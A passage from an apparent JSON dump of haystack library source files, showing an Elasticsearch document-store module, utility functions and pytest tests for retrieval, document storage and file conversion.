BM25, only filtering\n if query is None:\n body = {\"query\":\n {\"bool\": {\"must\":\n {\"match_all\": {}}}}} # type: Dict[str, Any]\n if filters:\n filter_clause = []\n for key, values in filters.items():\n filter_clause.append(\n {\n \"terms\": {key: values}\n }\n )\n body[\"query\"][\"bool\"][\"filter\"] = filter_clause\n\n # Retrieval via custom query\n elif custom_query: # substitute placeholder for question and filters for the custom_query template string\n template = Template(custom_query)\n # replace all \"${question}\" placeholder(s) with query\n substitutions = {\"question\": query}\n # For each filter we got passed, we'll try to find & replace the corresponding placeholder in the template\n # Example: filters={\"years\":[2018]} => replaces {$years} in custom_query with '[2018]'\n if filters:\n for key, values in filters.items():\n values_str = json.dumps(values)\n substitutions[key] = values_str\n custom_query_json = template.substitute(**substitutions)\n body = json.loads(custom_query_json)\n # add top_k\n body[\"size\"] = str(top_k)\n\n # Default Retrieval via BM25 using the user query on `self.search_fields`\n else:\n body = {\n \"size\": str(top_k),\n \"query\": {\n \"bool\": {\n \"should\": [{\"multi_match\": {\"query\": query, \"type\": \"most_fields\", \"fields\": self.search_fields}}]\n }\n },\n }\n\n if filters:\n filter_clause = []\n for key, values in filters.items():\n if type(values) != list:\n raise ValueError(f'Wrong filter format for key \"{key}\": Please provide a list of allowed values for each key. '\n 'Example: {\"name\": [\"some\", \"more\"], \"category\": [\"only_one\"]} ')\n filter_clause.append(\n {\n \"terms\": {key: values}\n }\n )\n body[\"query\"][\"bool\"][\"filter\"] = filter_clause\n\n if self.excluded_meta_data:\n body[\"_source\"] = {\"excludes\": self.excluded_meta_data}\n\n logger.debug(f\"Retriever query: {body}\")\n result = self.client.search(index=index, body=body)[\"hits\"][\"hits\"]\n\n documents = [self._convert_es_hit_to_document(hit) for hit in result]\n return documents\n\n def query_by_embedding(self,\n query_emb: np.array,\n filters: Optional[Dict[str, List[str]]] = None,\n top_k: int = 10,\n index: Optional[str] = None) -> List[Document]:\n if index is None:\n index = self.index\n\n if not self.embedding_field:\n raise RuntimeError(\"Please specify arg `embedding_field` in ElasticsearchDocumentStore()\")\n else:\n if self.similarity_function == \"cosineSimilarity\":\n source=f\"cosineSimilarity(params.query_vector,'{self.embedding_field}') + 1.0\" # +1 in cosine similarity to avoid negative numbers\n else: #i.e. self.similarity_function == \"dotProduct\"\n source=f\"dotProduct(params.query_vector,'{self.embedding_field}')+{self.offset_for_positive_dot_product}\"\n body= {\n \"size\": top_k,\n \"query\": {\n \"script_score\": {\n \"query\": {\"match_all\": {}},\n \"script\": {\n \"source\": source,\n \"params\": {\n \"query_vector\": query_emb.tolist()\n }\n }\n }\n }\n } # type: Dict[str,Any]\n\n if filters:\n for key, values in filters.items():\n if type(values) != list:\n raise ValueError(f'Wrong filter format for key \"{key}\": Please provide a list of allowed values for each key. '\n 'Example: {\"name\": [\"some\", \"more\"], \"category\": [\"only_one\"]} ')\n body[\"query\"][\"script_score\"][\"query\"] = {\"terms\": filters}\n\n if self.excluded_meta_data:\n body[\"_source\"] = {\"excludes\": self.excluded_meta_data}\n\n logger.debug(f\"Retriever query: {body}\")\n result = self.client.search(index=index, body=body, request_timeout=self.request_timeout)[\"hits\"][\"hits\"]\n\n documents = [self._convert_es_hit_to_document(hit, score_adjustment=-1) for hit in result]\n return documents\n\n def _convert_es_hit_to_document(self, hit: dict, score_adjustment: int = 0) -> Document:\n # We put all additional data of the doc into meta_data and return it in the API\n meta_data = {k:v for k,v in hit[\"_source\"].items() if k not in (self.text_field, self.faq_question_field, self.embedding_field)}\n name = meta_data.pop(self.name_field, None)\n if name:\n meta_data[\"name\"] = name\n\n document = Document(\n id=hit[\"_id\"],\n text=hit[\"_source\"].get(self.text_field),\n meta=meta_data,\n query_score=hit[\"_score\"] + score_adjustment if hit[\"_score\"] else None,\n question=hit[\"_source\"].get(self.faq_question_field),\n embedding=hit[\"_source\"].get(self.embedding_field)\n )\n return document\n\n def describe_documents(self, index=None):\n if index is None:\n index = self.index\n docs = self.get_all_documents(index)\n\n l = [len(d.text) for d in docs]\n stats = {\"count\": len(docs),\n \"chars_mean\": np.mean(l),\n \"chars_max\": max(l),\n \"chars_min\": min(l),\n \"chars_median\": np.median(l),\n }\n return stats\n\n\n\n def compute_and_store_embeddings(self, retriever, index, docs):\n logger.info(f\"Updating embeddings for {len(docs)} docs ...\")\n embeddings = retriever.embed_passages(docs)\n\n assert len(docs) == len(embeddings)\n\n if embeddings[0].shape[0] != self.embedding_dim:\n raise RuntimeError(f\"Embedding dim. of model ({embeddings[0].shape[0]})\"\n f\" doesn't match embedding dim. in documentstore ({self.embedding_dim}).\"\n \"Specify the arg `embedding_dim` when initializing ElasticsearchDocumentStore()\")\n doc_updates = []\n for doc, emb in zip(docs, embeddings):\n update = {\"_op_type\": \"update\",\n \"_index\": index,\n \"_id\": doc.id,\n \"doc\": {self.embedding_field: emb.tolist()},\n }\n doc_updates.append(update)\n\n bulk(self.client, doc_updates, request_timeout=self.request_timeout,refresh=self.refresh_type)\n\n\n def update_embeddings(self, retriever: BaseRetriever, index: Optional[str] = None, num_batches: Optional[int] = None, batch_size: Optional[int] = None, first_batch: Optional[int] = None):\n \"\"\"\n Updates the embeddings in the the document store using the encoding model specified in the retriever.\n This can be useful if want to add or change the embeddings for your documents (e.g. after changing the retriever config).\n\n :param retriever: Retriever\n :param index\n :param num_batches\n :param batch_size\n :param first_batch\n :return: None\n \"\"\"\n if index is None:\n index = self.index\n\n if not self.embedding_field:\n raise RuntimeError(\"Specify the arg `embedding_field` when initializing ElasticsearchDocumentStore()\")\n\n if num_batches: #batch processing\n if not(first_batch) or first_batch<0:\n first_batch=0 #start from the beginning\n for batch_to_execute in range(first_batch,num_batches):\n logger.info(f\"Batch {batch_to_execute}: Start at {datetime.datetime.now().strftime('%d/%m/%Y %H:%M:%S')}\")\n\n start_ID_doc=batch_to_execute*batch_size\n end_ID_doc=start_ID_doc+batch_size\n range_query_dict={\n 'myIntID': {\n \"gte\": start_ID_doc,\n \"lt\": end_ID_doc\n }\n }\n batch_docs = self.get_all_documents(index,filters=range_query_dict)\n self.compute_and_store_embeddings(retriever,index,batch_docs)\n else: #one single batch for all documents\n docs = self.get_all_documents(index)\n self.compute_and_store_embeddings(retriever,index,docs)\n\n def add_eval_data(self, filename: str, doc_index: str = \"eval_document\", label_index: str = \"label\"):\n \"\"\"\n Adds a SQuAD-formatted file to the DocumentStore in order to be able to perform evaluation on it.\n\n :param filename: Name of the file containing evaluation data\n :type filename: str\n :param doc_index: Elasticsearch index where evaluation documents should be stored\n :type doc_index: str\n :param label_index: Elasticsearch index where labeled questions should be stored\n :type label_index: str\n \"\"\"\n\n docs, labels = eval_data_from_file(filename)\n self.write_documents(docs, index=doc_index)\n self.write_labels(labels, index=label_index)\n\n def delete_all_documents(self, index: str):\n \"\"\"\n Delete all documents in an index.\n\n :param index: index name\n :return: None\n \"\"\"\n self.client.delete_by_query(index=index, body={\"query\": {\"match_all\": {}}}, ignore=[404])\n # We want to be sure that all docs are deleted before continuing (delete_by_query doesn't support wait_for)\n time.sleep(1)\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6494845151901245,
"alphanum_fraction": 0.6691659092903137,
"avg_line_length": 37.14285659790039,
"blob_id": "6681f9da30ca99db37af6b855ea3ea89719a5fb9",
"content_id": "0b5796f278992a9fecf3d53ab50a3fb875b6c3d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1067,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 28,
"path": "/test/test_faiss.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pytest\n\n\[email protected](\"document_store\", [\"faiss\"], indirect=True)\ndef test_faiss_indexing(document_store):\n documents = [\n {\"name\": \"name_1\", \"text\": \"text_1\", \"embedding\": np.random.rand(768).astype(np.float32)},\n {\"name\": \"name_2\", \"text\": \"text_2\", \"embedding\": np.random.rand(768).astype(np.float32)},\n {\"name\": \"name_3\", \"text\": \"text_3\", \"embedding\": np.random.rand(768).astype(np.float32)},\n ]\n\n document_store.write_documents(documents)\n documents_indexed = document_store.get_all_documents()\n\n # test if correct vector_ids are assigned\n for i, doc in enumerate(documents_indexed):\n assert doc.meta[\"vector_id\"] == str(i)\n\n # test insertion of documents in an existing index fails\n with pytest.raises(Exception):\n document_store.write_documents(documents)\n\n # test saving the index\n document_store.save(\"haystack_test_faiss\")\n\n # test loading the index\n document_store.load(sql_url=\"sqlite:///haystack_test.db\", faiss_file_path=\"haystack_test_faiss\")"
},
{
"alpha_fraction": 0.6497145891189575,
"alphanum_fraction": 0.6642449498176575,
"avg_line_length": 44.78571319580078,
"blob_id": "835ff757652b51f90ab60690ca58435d6e4efed4",
"content_id": "e7a11eb595428947a501301bd5feca28df0c3e9f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1927,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 42,
"path": "/test/test_finder.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack import Finder\nfrom haystack.retriever.sparse import TfidfRetriever\nimport pytest\n\n\ndef test_finder_get_answers(reader, document_store_with_docs):\n retriever = TfidfRetriever(document_store=document_store_with_docs)\n finder = Finder(reader, retriever)\n prediction = finder.get_answers(question=\"Who lives in Berlin?\", top_k_retriever=10,\n top_k_reader=3)\n assert prediction is not None\n assert prediction[\"question\"] == \"Who lives in Berlin?\"\n assert prediction[\"answers\"][0][\"answer\"] == \"Carla\"\n assert prediction[\"answers\"][0][\"probability\"] <= 1\n assert prediction[\"answers\"][0][\"probability\"] >= 0\n assert prediction[\"answers\"][0][\"meta\"][\"meta_field\"] == \"test1\"\n assert prediction[\"answers\"][0][\"context\"] == \"My name is Carla and I live in Berlin\"\n\n assert len(prediction[\"answers\"]) == 3\n\n\ndef test_finder_offsets(reader, document_store_with_docs):\n retriever = TfidfRetriever(document_store=document_store_with_docs)\n finder = Finder(reader, retriever)\n prediction = finder.get_answers(question=\"Who lives in Berlin?\", top_k_retriever=10,\n top_k_reader=5)\n\n assert prediction[\"answers\"][0][\"offset_start\"] == 11\n assert prediction[\"answers\"][0][\"offset_end\"] == 16\n start = prediction[\"answers\"][0][\"offset_start\"]\n end = prediction[\"answers\"][0][\"offset_end\"]\n assert prediction[\"answers\"][0][\"context\"][start:end] == prediction[\"answers\"][0][\"answer\"]\n\n\ndef test_finder_get_answers_single_result(reader, document_store_with_docs):\n retriever = TfidfRetriever(document_store=document_store_with_docs)\n finder = Finder(reader, retriever)\n query = \"testing finder\"\n prediction = finder.get_answers(question=query, top_k_retriever=1,\n top_k_reader=1)\n assert prediction is not None\n assert len(prediction[\"answers\"]) == 1\n\n\n\n\n"
},
{
"alpha_fraction": 0.5522751808166504,
"alphanum_fraction": 0.5539003014564514,
"avg_line_length": 31.104347229003906,
"blob_id": "095b3e2b01808d2d32adc3e12de01a99432231f7",
"content_id": "2f19e04d40ea86e480110d1eb0cf6a4c0af167bf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3692,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 115,
"path": "/haystack/utils.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import json\nfrom collections import defaultdict\nimport logging\nimport pprint\nimport pandas as pd\nfrom typing import Dict, Any, List\nfrom haystack.database.sql import DocumentORM\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef print_answers(results: dict, details: str = \"all\"):\n answers = results[\"answers\"]\n pp = pprint.PrettyPrinter(indent=4)\n if details != \"all\":\n if details == \"minimal\":\n keys_to_keep = set([\"answer\", \"context\"])\n elif details == \"medium\":\n keys_to_keep = set([\"answer\", \"context\", \"score\"])\n else:\n keys_to_keep = answers.keys()\n\n # filter the results\n filtered_answers = []\n for ans in answers:\n filtered_answers.append({k: ans[k] for k in keys_to_keep})\n pp.pprint(filtered_answers)\n else:\n pp.pprint(results)\n\n\ndef export_answers_to_csv(agg_results: list, output_file):\n \"\"\"\n Exports answers coming from finder.get_answers() to a CSV file\n :param agg_results: list of predictions coming from finder.get_answers()\n :param output_file: filename of output file\n :return: None\n \"\"\"\n if isinstance(agg_results, dict):\n agg_results = [agg_results]\n\n assert \"question\" in agg_results[0], f\"Wrong format used for {agg_results[0]}\"\n assert \"answers\" in agg_results[0], f\"Wrong format used for {agg_results[0]}\"\n\n data = {} # type: Dict[str, List[Any]]\n data[\"question\"] = []\n data[\"prediction\"] = []\n data[\"prediction_rank\"] = []\n data[\"prediction_context\"] = []\n\n for res in agg_results:\n for i in range(len(res[\"answers\"])):\n temp = res[\"answers\"][i]\n data[\"question\"].append(res[\"question\"])\n data[\"prediction\"].append(temp[\"answer\"])\n data[\"prediction_rank\"].append(i + 1)\n data[\"prediction_context\"].append(temp[\"context\"])\n\n df = pd.DataFrame(data)\n df.to_csv(output_file, index=False)\n\n\n\ndef convert_labels_to_squad(labels_file: str):\n \"\"\"\n Convert the export from the labeling UI to SQuAD format for training.\n\n :param labels_file: path for export file from the labeling tool\n :return:\n \"\"\"\n with open(labels_file) as label_file:\n labels = json.load(label_file)\n\n labels_grouped_by_documents = defaultdict(list)\n for label in labels:\n labels_grouped_by_documents[label[\"document_id\"]].append(label)\n\n labels_in_squad_format = {\"data\": []} # type: Dict[str, Any]\n for document_id, labels in labels_grouped_by_documents.items():\n qas = []\n for label in labels:\n doc = DocumentORM.query.get(label[\"document_id\"])\n\n assert (\n doc.text[label[\"start_offset\"] : label[\"end_offset\"]]\n == label[\"selected_text\"]\n )\n\n qas.append(\n {\n \"question\": label[\"question\"],\n \"id\": label[\"id\"],\n \"question_id\": label[\"question_id\"],\n \"answers\": [\n {\n \"text\": label[\"selected_text\"],\n \"answer_start\": label[\"start_offset\"],\n \"labeller_id\": label[\"labeler_id\"],\n }\n ],\n \"is_impossible\": False,\n }\n )\n\n squad_format_label = {\n \"paragraphs\": [\n {\"qas\": qas, \"context\": doc.text, \"document_id\": document_id}\n ]\n }\n\n labels_in_squad_format[\"data\"].append(squad_format_label)\n\n with open(\"labels_in_squad_format.json\", \"w+\") as outfile:\n json.dump(labels_in_squad_format, outfile)\n"
},
{
"alpha_fraction": 0.6068922877311707,
"alphanum_fraction": 0.6207181215286255,
"avg_line_length": 36.859375,
"blob_id": "e4d5d2d9abc135edf1a79479ef1b436770a3b253",
"content_id": "12689fff9418152ded3cdcaed25a735c1901e08b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9692,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 256,
"path": "/test/test_db.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pytest\nfrom elasticsearch import Elasticsearch\n\nfrom haystack.database.base import Document, Label\nfrom haystack.database.elasticsearch import ElasticsearchDocumentStore\nfrom haystack.database.faiss import FAISSDocumentStore\n\n\ndef test_get_all_documents_without_filters(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents()\n assert all(isinstance(d, Document) for d in documents)\n assert len(documents) == 3\n assert {d.meta[\"name\"] for d in documents} == {\"filename1\", \"filename2\", \"filename3\"}\n assert {d.meta[\"meta_field\"] for d in documents} == {\"test1\", \"test2\", \"test3\"}\n\n\ndef test_get_all_documents_with_correct_filters(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents(filters={\"meta_field\": [\"test2\"]})\n assert len(documents) == 1\n assert documents[0].meta[\"name\"] == \"filename2\"\n\n documents = document_store_with_docs.get_all_documents(filters={\"meta_field\": [\"test1\", \"test3\"]})\n assert len(documents) == 2\n assert {d.meta[\"name\"] for d in documents} == {\"filename1\", \"filename3\"}\n assert {d.meta[\"meta_field\"] for d in documents} == {\"test1\", \"test3\"}\n\n\ndef test_get_all_documents_with_incorrect_filter_name(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents(filters={\"incorrect_meta_field\": [\"test2\"]})\n assert len(documents) == 0\n\n\ndef test_get_all_documents_with_incorrect_filter_value(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents(filters={\"meta_field\": [\"incorrect_value\"]})\n assert len(documents) == 0\n\n\ndef test_get_documents_by_id(document_store_with_docs):\n documents = document_store_with_docs.get_all_documents()\n doc = document_store_with_docs.get_document_by_id(documents[0].id)\n assert doc.id == documents[0].id\n assert doc.text == documents[0].text\n\n\ndef test_write_document_meta(document_store):\n documents = [\n {\"text\": \"dict_without_meta\", \"id\": \"1\"},\n {\"text\": \"dict_with_meta\", \"meta_field\": \"test2\", \"name\": \"filename2\", \"id\": \"2\"},\n Document(text=\"document_object_without_meta\", id=\"3\"),\n Document(text=\"document_object_with_meta\", meta={\"meta_field\": \"test4\", \"name\": \"filename3\"}, id=\"4\"),\n ]\n document_store.write_documents(documents)\n documents_in_store = document_store.get_all_documents()\n assert len(documents_in_store) == 4\n\n assert not document_store.get_document_by_id(\"1\").meta\n assert document_store.get_document_by_id(\"2\").meta[\"meta_field\"] == \"test2\"\n assert not document_store.get_document_by_id(\"3\").meta\n assert document_store.get_document_by_id(\"4\").meta[\"meta_field\"] == \"test4\"\n\n\ndef test_write_document_index(document_store):\n documents = [\n {\"text\": \"text1\", \"id\": \"1\"},\n {\"text\": \"text2\", \"id\": \"2\"},\n ]\n document_store.write_documents([documents[0]], index=\"haystack_test_1\")\n assert len(document_store.get_all_documents(index=\"haystack_test_1\")) == 1\n\n if not isinstance(document_store, FAISSDocumentStore): # addition of more documents is not supported in FAISS\n document_store.write_documents([documents[1]], index=\"haystack_test_2\")\n assert len(document_store.get_all_documents(index=\"haystack_test_2\")) == 1\n\n assert len(document_store.get_all_documents(index=\"haystack_test_1\")) == 1\n assert len(document_store.get_all_documents()) == 0\n\n\ndef test_labels(document_store):\n label = Label(\n question=\"question\",\n answer=\"answer\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=12,\n no_answer=False,\n origin=\"gold_label\",\n )\n document_store.write_labels([label], index=\"haystack_test_label\")\n labels = document_store.get_all_labels(index=\"haystack_test_label\")\n assert len(labels) == 1\n\n labels = document_store.get_all_labels()\n assert len(labels) == 0\n\n\ndef test_multilabel(document_store):\n labels =[\n Label(\n question=\"question\",\n answer=\"answer1\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=12,\n no_answer=False,\n origin=\"gold_label\",\n ),\n # different answer in same doc\n Label(\n question=\"question\",\n answer=\"answer2\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=42,\n no_answer=False,\n origin=\"gold_label\",\n ),\n # answer in different doc\n Label(\n question=\"question\",\n answer=\"answer3\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"321\",\n offset_start_in_doc=7,\n no_answer=False,\n origin=\"gold_label\",\n ),\n # 'no answer', should be excluded from MultiLabel\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"777\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # is_correct_answer=False, should be excluded from MultiLabel\n Label(\n question=\"question\",\n answer=\"answer5\",\n is_correct_answer=False,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=99,\n no_answer=True,\n origin=\"gold_label\",\n ),\n ]\n document_store.write_labels(labels, index=\"haystack_test_multilabel\")\n multi_labels = document_store.get_all_labels_aggregated(index=\"haystack_test_multilabel\")\n labels = document_store.get_all_labels(index=\"haystack_test_multilabel\")\n\n assert len(multi_labels) == 1\n assert len(labels) == 5\n\n assert len(multi_labels[0].multiple_answers) == 3\n assert len(multi_labels[0].multiple_answers) \\\n == len(multi_labels[0].multiple_document_ids) \\\n == len(multi_labels[0].multiple_offset_start_in_docs)\n\n multi_labels = document_store.get_all_labels_aggregated()\n assert len(multi_labels) == 0\n\n # clean up\n document_store.delete_all_documents(index=\"haystack_test_multilabel\")\n\n\ndef test_multilabel_no_answer(document_store):\n labels = [\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"777\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # no answer in different doc\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"123\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # no answer in same doc, should be excluded\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=True,\n is_correct_document=True,\n document_id=\"777\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n # no answer with is_correct_answer=False, should be excluded\n Label(\n question=\"question\",\n answer=\"\",\n is_correct_answer=False,\n is_correct_document=True,\n document_id=\"321\",\n offset_start_in_doc=0,\n no_answer=True,\n origin=\"gold_label\",\n ),\n ]\n\n document_store.write_labels(labels, index=\"haystack_test_multilabel_no_answer\")\n multi_labels = document_store.get_all_labels_aggregated(index=\"haystack_test_multilabel_no_answer\")\n labels = document_store.get_all_labels(index=\"haystack_test_multilabel_no_answer\")\n\n assert len(multi_labels) == 1\n assert len(labels) == 4\n\n assert len(multi_labels[0].multiple_document_ids) == 2\n assert len(multi_labels[0].multiple_answers) \\\n == len(multi_labels[0].multiple_document_ids) \\\n == len(multi_labels[0].multiple_offset_start_in_docs)\n\n # clean up\n document_store.delete_all_documents(index=\"haystack_test_multilabel_no_answer\")\n\n\[email protected](\"document_store_with_docs\", [\"elasticsearch\"], indirect=True)\ndef test_elasticsearch_update_meta(document_store_with_docs):\n document = document_store_with_docs.query(query=None, filters={\"name\": [\"filename1\"]})[0]\n document_store_with_docs.update_document_meta(document.id, meta={\"meta_field\": \"updated_meta\"})\n updated_document = document_store_with_docs.query(query=None, filters={\"name\": [\"filename1\"]})[0]\n assert updated_document.meta[\"meta_field\"] == \"updated_meta\"\n\n\ndef test_elasticsearch_custom_fields(elasticsearch_fixture):\n client = Elasticsearch()\n client.indices.delete(index='haystack_test_custom', ignore=[404])\n document_store = ElasticsearchDocumentStore(index=\"haystack_test_custom\", text_field=\"custom_text_field\",\n embedding_field=\"custom_embedding_field\")\n\n doc_to_write = {\"custom_text_field\": \"test\", \"custom_embedding_field\": np.random.rand(768).astype(np.float32)}\n document_store.write_documents([doc_to_write])\n documents = document_store.get_all_documents()\n assert len(documents) == 1\n assert documents[0].text == \"test\"\n np.testing.assert_array_equal(doc_to_write[\"custom_embedding_field\"], documents[0].embedding)\n"
},
{
"alpha_fraction": 0.7052954435348511,
"alphanum_fraction": 0.7187260389328003,
"avg_line_length": 45.55356979370117,
"blob_id": "2bf440311600df02e45c3df5f37a7289719ac6dd",
"content_id": "2436ba2f287aeb7a4e52a8d60d64be30d27b1f7d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2606,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 56,
"path": "/test/test_pdf_conversion.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\n\nimport pytest\n\nfrom haystack.indexing.file_converters.pdf import PDFToTextConverter\nfrom haystack.indexing.file_converters.tika import TikaConverter\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_extract_pages(Converter, xpdf_fixture):\n converter = Converter()\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n assert len(pages) == 4 # the sample PDF file has four pages.\n assert pages[0] != \"\" # the page 1 of PDF contains text.\n assert pages[2] == \"\" # the page 3 of PDF file is empty.\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_table_removal(Converter, xpdf_fixture):\n converter = Converter(remove_numeric_tables=True)\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n\n # assert numeric rows are removed from the table.\n assert \"324\" not in pages[0]\n assert \"54x growth\" not in pages[0]\n\n # assert text is retained from the document.\n assert \"Adobe Systems made the PDF specification available free of charge in 1993.\" in pages[0].replace(\"\\n\", \"\")\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_language_validation(Converter, xpdf_fixture, caplog):\n converter = Converter(valid_languages=[\"en\"])\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n assert \"The language for samples/pdf/sample_pdf_1.pdf is not one of ['en'].\" not in caplog.text\n\n converter = Converter(valid_languages=[\"de\"])\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\"))\n assert \"The language for samples/pdf/sample_pdf_1.pdf is not one of ['de'].\" in caplog.text\n\n\[email protected](\"Converter\", [PDFToTextConverter, TikaConverter])\ndef test_header_footer_removal(Converter, xpdf_fixture):\n converter = Converter(remove_header_footer=True)\n converter_no_removal = Converter(remove_header_footer=False)\n\n pages1, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\")) # file contains no header/footer\n pages2, _ = converter_no_removal.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_1.pdf\")) # file contains no header/footer\n for p1, p2 in zip(pages1, pages2):\n assert p2 == p2\n\n pages, _ = converter.extract_pages(file_path=Path(\"samples/pdf/sample_pdf_2.pdf\")) # file contains header and footer\n assert len(pages) == 4\n for page in pages:\n assert \"This is a header.\" not in page\n assert \"footer\" not in page"
},
{
"alpha_fraction": 0.6859459280967712,
"alphanum_fraction": 0.6983783841133118,
"avg_line_length": 51.85714340209961,
"blob_id": "03922637fc775980fb7800760fd8463b9eb6ba47",
"content_id": "6089a095480d0ba40127815463929619d7671f35",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1850,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 35,
"path": "/test/test_elastic_retriever.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack.retriever.sparse import ElasticsearchRetriever\nimport pytest\n\n\[email protected](\"document_store_with_docs\", [(\"elasticsearch\")], indirect=True)\ndef test_elasticsearch_retrieval(document_store_with_docs):\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\")\n assert res[0].text == \"My name is Carla and I live in Berlin\"\n assert len(res) == 3\n assert res[0].meta[\"name\"] == \"filename1\"\n\[email protected](\"document_store_with_docs\", [(\"elasticsearch\")], indirect=True)\ndef test_elasticsearch_retrieval_filters(document_store_with_docs):\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\": [\"filename1\"]})\n assert res[0].text == \"My name is Carla and I live in Berlin\"\n assert len(res) == 1\n assert res[0].meta[\"name\"] == \"filename1\"\n\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"meta_field\": [\"not_existing_value\"]})\n assert len(res) == 0\n\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"not_existing_field\": [\"not_existing_value\"]})\n assert len(res) == 0\n\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"meta_field\": [\"test1\",\"test2\"]})\n assert res[0].text == \"My name is Carla and I live in Berlin\"\n assert len(res) == 1\n assert res[0].meta[\"name\"] == \"filename1\"\n\n retriever = ElasticsearchRetriever(document_store=document_store_with_docs)\n res = retriever.retrieve(query=\"Who lives in Berlin?\", filters={\"name\":[\"filename1\"], \"meta_field\":[\"test2\"]})\n assert len(res) == 0\n"
},
{
"alpha_fraction": 0.7489539980888367,
"alphanum_fraction": 0.7552301287651062,
"avg_line_length": 46.79999923706055,
"blob_id": "a26d3b47cc427b88a861f30db4d662876c14c543",
"content_id": "6d570c373824ad749c7cc4dca0833cb121f316ec",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 10,
"path": "/test/test_docx_conversion.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\n\nfrom haystack.indexing.file_converters.docx import DocxToTextConverter\n\n\ndef test_extract_pages():\n converter = DocxToTextConverter()\n paragraphs, _ = converter.extract_pages(file_path=Path(\"samples/docx/sample_docx.docx\"))\n assert len(paragraphs) == 8 # Sample has 8 Paragraphs\n assert paragraphs[1] == 'The US has \"passed the peak\" on new coronavirus cases, President Donald Trump said and predicted that some states would reopen this month.'\n"
},
{
"alpha_fraction": 0.6381322741508484,
"alphanum_fraction": 0.661478579044342,
"avg_line_length": 39.578948974609375,
"blob_id": "27d6faafb4178fe1425a2976f2bd11d07bfd79b9",
"content_id": "c8b6c6fe1c7d27281830361575a60ed496e897d0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 771,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 19,
"path": "/test/test_tfidf_retriever.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
